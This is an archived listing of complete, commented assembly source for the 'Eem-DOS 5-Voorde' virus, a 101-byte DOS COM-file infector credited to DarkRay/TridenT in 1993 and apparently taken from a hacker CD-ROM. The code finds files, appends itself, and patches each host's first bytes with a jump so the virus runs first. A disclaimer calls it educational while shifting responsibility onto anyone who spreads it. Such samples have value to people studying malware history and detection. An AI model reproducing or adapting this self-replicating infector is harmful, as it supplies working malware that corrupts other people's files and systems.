home *** CD-ROM | disk | FTP | other *** search
/ HaCKeRz Kr0nlcKLeZ 1 / HaCKeRz Kr0nlcKLeZ.iso / chibacity / tdupdat2.err / DARK-RAY.ZIP / EEMVOOR2.ZIP / EE3.ASM next >
Encoding:
Assembly Source File  |  1997-03-22  |  4.5 KB  |  121 lines
  1. ;               The Eem-DOS 5-Voorde Virus version 2.0
  2. ;
  3. ; Smallest (101 bytes) COM file infector which works with te folowing
  4. ; principe:
  5. ;
  6. ; Before:
  7. ;    _____________________  ____________
  8. ;   [first 3 bytes of file][rest of file]
  9. ;
  10. ; After:
  11. ;    ____________  ____________  _____  _____________________
  12. ;   [jmp to virus][rest of file][virus][first 3 bytes of file]
  13. ;
  14. ; This way the virus can restore the first 3 bytes of the file so
  15. ; the file will still work.
  16. ;
  17. ; If you want no registers to change you can add some pushes, but
  18. ; it'll make the virus much larger.....
  19. ;
  20. ;       (C)1993 by [DαRkRαY] / TridenT
  21. ;
  22. ; BTW This is only a educational source, and this virus should not be
  23. ; spread, you may publish this file in it's original form.
  24. ; If you intend to spread this virus you will take all the responsibilities
  25. ; on youself so the author will not get into trubble.
  26. ; If you do not agree with this, destroy this file now.
  27. ;
  28. _CODE   SEGMENT
  29.         ASSUME  CS:_CODE
  30.  
  31.         ORG     100h
  32.  
  33.         LEN     EQU THE_END - VX                ; This bab's length
  34.  
  35. START:
  36.         DB      0E9h,0,0                        ; Jump te virus. (carrier
  37.                                                 ; program)
  38. VX:
  39.         mov     si,100H
  40.         PUSH    SI                              ; Put 100h in DI and save
  41.         PUSH    SI                              ; it as return point.
  42.         POP     DI                              ;
  43.  
  44.         CALL    RELATIVE                        ;
  45. RELATIVE:                                       ; Calculate where the old 3
  46.         POP     SI                              ; bytes are stored.
  47.         ADD     SI,(OLD_BYTES - RELATIVE)       ;
  48.  
  49.         PUSH    SI                              ; Save it for later.
  50.  
  51. ;        MOV     CL,3                            ; Restore the first 3 bytes.
  52. ;        REP     MOVSB                           ;
  53.         xor     cl,cl
  54.         movsw
  55.         movsb
  56.  
  57.         MOV     DX,SI                           ; Set DX to file spec.
  58.  
  59.         POP     SI                              ; Restore SI
  60.  
  61.         DEC     AX                              ;
  62. AGAIN:  ADD     AH,4Fh                          ; Search for (next) file
  63.         INT     21h                             ; and exit if non found.
  64.         JC      EXIT                            ;
  65.  
  66.         MOV     DI,SI                           ; Put SI in DI
  67.  
  68.         MOV     AH,3Eh                          ; Close open file. (also
  69.         CALL    OPEN                            ; nice anti-debug trick!)
  70.  
  71.         MOV     AH,3Fh                          ; Read first 3 bytes.
  72.         CALL    IO                              ;
  73.  
  74.         CMP     BYTE PTR [DI],0E9h              ; Next file if first instr.
  75.         JE      AGAIN                           ; is a JMP FAR. (marker)
  76.  
  77.         MOV     AX,4202h                        ;
  78.         XOR     CX,CX                           ; Goto EOF.
  79.         CWD                                     ;
  80.         INT     21h                             ;
  81.  
  82.         SUB     AX,3                            ;
  83.         ADD     DI,8                            ; Set JMP to virus.
  84.         MOV     WORD PTR DS:[DI],AX             ;
  85.  
  86.         MOV     AH,40h                          ;
  87.         MOV     CL,LEN                          ; Write virus and open
  88.         MOV     DX,DI                           ; file again.
  89.         SUB     DX,(OLD_BYTES - VX) + 8         ;
  90.         CALL    OPEN                            ;
  91.  
  92.         DEC     DI                              ; Write JMP
  93.         MOV     AH,40h                          ;
  94. IO:
  95.         MOV     CL,3                            ;
  96.         MOV     DX,DI                           ; Read or write 3 bytes.
  97.         INT     21h                             ;
  98. EXIT:
  99.         RET                                     ; Start carrier program.
  100.  
  101. OPEN:
  102.         INT     21h                             ;
  103.         MOV     AX,3D02h                        ;
  104.         MOV     DX,9Eh                          ; Open file.
  105.         INT     21h                             ;
  106.         XCHG    BX,AX                           ;
  107.         RET
  108.  
  109. OLD_BYTES:      NOP                             ;
  110.                 NOP                             ; First 3 bytes of carrier
  111.                 RET                             ; program.
  112.  
  113. FILE_NAME:      DB      '*.*',0h                ; File to search for (all)
  114.  
  115. NEW_BYTES       DB      0E9h                    ; JMP to virus buffer.
  116.  
  117. THE_END:
  118.  
  119. _CODE   ENDS
  120.         END     START
  121.